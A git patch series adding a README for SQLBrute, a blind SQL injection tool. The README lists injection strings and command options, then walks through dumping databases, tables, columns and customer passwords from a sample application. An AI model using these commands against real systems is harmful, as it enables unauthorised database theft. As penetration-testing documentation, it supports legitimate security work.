From bc6e3ced50d61c94e8d6b1fa2169ad740e40eff6 Mon Sep 17 00:00:00 2001 From: Alberto Barradas Date: Sun, 22 Feb 2015 20:23:52 -0600 Subject: [PATCH 1/4] Added README message from www.gdssecurity.com --- README | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/README b/README index e69de29..ccb071e 100644 --- a/README +++ b/README @@ -0,0 +1,7 @@ +# SQL Brute +SQLBrute is a tool for brute forcing data out of databases using blind SQL +injection vulnerabilities. It supports time based and error based exploit +types on Microsoft SQL Server, and error based exploit on Oracle. +It is written in Python, uses multi-threading, and doesn't require +non-standard libraries. The full walkthrough of using SQLBrute can be found on +[Justin Clarke's personal blog](http://www.justinclarke.com/2006/03/using-sqlbrute-to-brute-force-data-from.html). From 9ed79c5655e9b7ea917d8894c520f11c2ccf3605 Mon Sep 17 00:00:00 2001 From: Alberto Barradas Date: Sun, 22 Feb 2015 20:39:16 -0600 Subject: [PATCH 2/4] Added usage specifications from Justin Clarke's personal blog --- README | 151 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 151 insertions(+) diff --git a/README b/README index ccb071e..7df624c 100644 --- a/README +++ b/README @@ -5,3 +5,154 @@ types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn't require non-standard libraries. The full walkthrough of using SQLBrute can be found on [Justin Clarke's personal blog](http://www.justinclarke.com/2006/03/using-sqlbrute-to-brute-force-data-from.html). + +## Usage +For error based SQL injection, SQLBrute should work, if you can either: +- Get an identifiable difference between adding the exploit strings `AND 1=1` and `AND 1=2` to your SQL injection point (usually works if the query is normally valid) +- Get an identifiable difference between adding the exploit strings `OR 1=1` and `OR 1=2` to your SQL injection point (usually works if the query is normally invalid) + +For time based SQL injection, SQLBrute should work if you can use exploit syntax similar to `;waitfor delay '0:0:5'` to generate a time delay in Microsoft SQL Server. + +Here is the options printed from SQLBrute when you run it with no options: +``` +___ _____ __ ____ ____ __ __ ____ ____ +/ __)( _ )( ) ( _ \( _ \( )( )(_ _)( ___) +\__ \ )(_)( )(__ ) _ < ) / )(__)( )( )__) +(___/(___/\\(____)(____/(_)\_)(______) (__) (____) + +Usage: ./sqlbrute.py options url +[--help|-h] +[--verbose|-v] +[--server|-d oracle|sqlserver] +[--error|-e regex] +[--threads|-s number] +[--cookie|-k string] +[--time|-n] +[--data|-p string] +[--database|-f database] +[--table|-t table] +[--column|-c column] +[--where|-w column=data] +[--header|-x header::val] +``` + +The only required command line option is the URL. If the vulnerable parameter is on the URL (i.e. in the querystring), that parameter needs to be on the end of the URL and in a format that SQL can be added on the end (i.e. param=foo' is sufficient in a lot of cases). + +If the vulnerable parameter is in the POST data, you need to specify a --data option (see below), and have the vulnerable parameter at the end (as for a URL parameter, including a single quote or whatever is needed for the SQL injection point). The tool assumes that it can terminate the SQL using --, and also assumes that you're not going to be exploiting querystring variables on a POST. + +Several of the options are for including required information in the requests to the server. You may need to wrap arguments in double quotes because of spaces and special characters in the data: +- `--data` allows you to specify POST data for a form post. Takes a string containing all the data as an argument +- `--cookie` allows you to specify the cookies to be supplied. Takes a string containing all the cookies as an argument +- `--header` allows you to specify arbitrary HTTP headers to include in the request (e.g. Accepts headers or similar). The header name and value need to be supplied as a single argument of the form header::value + +Other options modify the default behaviour of the tool: +- `--server` forces the tool to use Oracle or SQL Server exploit techniques. This is needed because the tool defaults to SQL Server, and won't intelligently detect that Oracle is in use +- `--threads` specifies how many worker threads the tool will use to send requests. This defaults to 5, however this should be reduced if you are getting unreliable results (especially when doing time based testing). Setting this too high has a tendency to max the CPU on your machine, and have bad effects on the machine you're testing +- `--time` forces the tool to use time based testing instead of error based testing +- `--verbose` turns on verbose output. By default the tool doesn't output anything until it has completely enumerated an entry, which can lead to wondering whether it is actually doing anything. Using verbose once will output preliminary results - allowing you to see that its working. Using verbose twice will output requests and responses to allow debug issues with the tool +- `--output` allows us to specify an output file for the results. Otherwise the only results we will get will be to stdout + +The tool is designed to be used in a logical progression: +- Running the tool without specifying a database, table, or column parameter will enumerate the list of databases for SQL Server, and the list of user tables for Oracle +- Running the tool with the name of a database (SQL Server only) will enumerate the list of tables +- Running the tool with a table parameter (plus database parameter for SQL Server) will enumerate the columns in that table +- Running the tool with a column parameter (with table and database parameters if applicable) will enumerate the data in that column of that parameter. You can then find matching values in other columns of the table through using a `--where` command line option + +And here is an example of enumeration from beginning to end on a sample application to see how this all works. In this example there is a SQL injection error in this ASP/SQL Server application on the locator.asp page. This is exploited through a POST, and the vulnerable parameter is the county parameter: + +### Enumerating databases +``` + +./sqlbrute.py --data "searchtype=county&county=GM'" \ +--error "NO RESULTS" http://192.168.182.128/locator.asp + +This program will currently exit 60 seconds after the last +response comes in. +Found: msdb +Found: pubs +Found: model +Found: tempdb +Found: master +Found: webapp +``` + +### Enumerating tables +``` + +./sqlbrute.py --data "searchtype=county&county=GM'" \ +--error "NO RESULTS" --database webapp \ +http://192.168.182.128/locator.asp + +This program will currently exit 60 seconds after the last +response comes in. +Found: myview +Found: locator +Found: customer +Found: postings +Found: responses +Found: dtproperties +Found: fresh_postings +Found: fresh_responses + +``` + +### Enumerating columns +``` + +./sqlbrute.py --data "searchtype=county&county=GM'" \ +--error "NO RESULTS" --database webapp --table customer \ +http://192.168.182.128/locator.asp + +This program will currently exit 60 seconds after the last +response comes in. +Found: city +Found: email +Found: lname +Found: fname +Found: mname +Found: phone +Found: endbal +Found: county +Found: begbal +Found: address +Found: custnum +Found: deposits +Found: password +Found: postcode +Found: withdrawals +``` + +### Enumerating passwords +``` + +./sqlbrute.py --data "searchtype=county&county=GM'" \ +--error "NO RESULTS" --database webapp --table customer \ +--column password http://192.168.182.128/locator.asp + +This program will currently exit 60 seconds after the last +response comes in. +Found: dog +Found: test +Found: hawk +Found: loki +Found: fish +Found: buzz + + + +``` + +### Enumerating the customer number for a specific password +``` + +./sqlbrute.py --data "searchtype=county&county=GM'" \ +--error "NO RESULTS" --database webapp --table customer \ +--column custnum --where password=dog \ +http://192.168.182.128/locator.asp + +This program will currently exit 60 seconds after the last +response comes in. +Found: 1.036512520000000e+008 +``` + +Note in the above example, the customer number is numeric. Due to the conversion used in the tool, it is shown in scientific notation (i.e. it is actually 103651252). From df01fc76b99892dfaab263c8aafa4b88bf01d202 Mon Sep 17 00:00:00 2001 From: Alberto Barradas Date: Sun, 22 Feb 2015 20:41:31 -0600 Subject: [PATCH 3/4] Minimum changes --- README | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README b/README index 7df624c..5cc13dc 100644 --- a/README +++ b/README @@ -7,6 +7,7 @@ non-standard libraries. The full walkthrough of using SQLBrute can be found on [Justin Clarke's personal blog](http://www.justinclarke.com/2006/03/using-sqlbrute-to-brute-force-data-from.html). ## Usage +#### From [Justin Clarke's personal blog](http://www.justinclarke.com/2006/03/using-sqlbrute-to-brute-force-data-from.html). For error based SQL injection, SQLBrute should work, if you can either: - Get an identifiable difference between adding the exploit strings `AND 1=1` and `AND 1=2` to your SQL injection point (usually works if the query is normally valid) - Get an identifiable difference between adding the exploit strings `OR 1=1` and `OR 1=2` to your SQL injection point (usually works if the query is normally invalid) @@ -155,4 +156,4 @@ response comes in. Found: 1.036512520000000e+008 ``` -Note in the above example, the customer number is numeric. Due to the conversion used in the tool, it is shown in scientific notation (i.e. it is actually 103651252). +Note: in the above example, the customer number is numeric. Due to the conversion used in the tool, it is shown in scientific notation (i.e. it is actually 103651252). From cadfcff98b6e5ad942b162dcc5a783d8a5982157 Mon Sep 17 00:00:00 2001 From: Alberto Barradas Date: Sun, 22 Feb 2015 20:43:05 -0600 Subject: [PATCH 4/4] Markdown syntax --- README => README.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename README => README.md (100%) diff --git a/README b/README.md similarity index 100% rename from README rename to README.md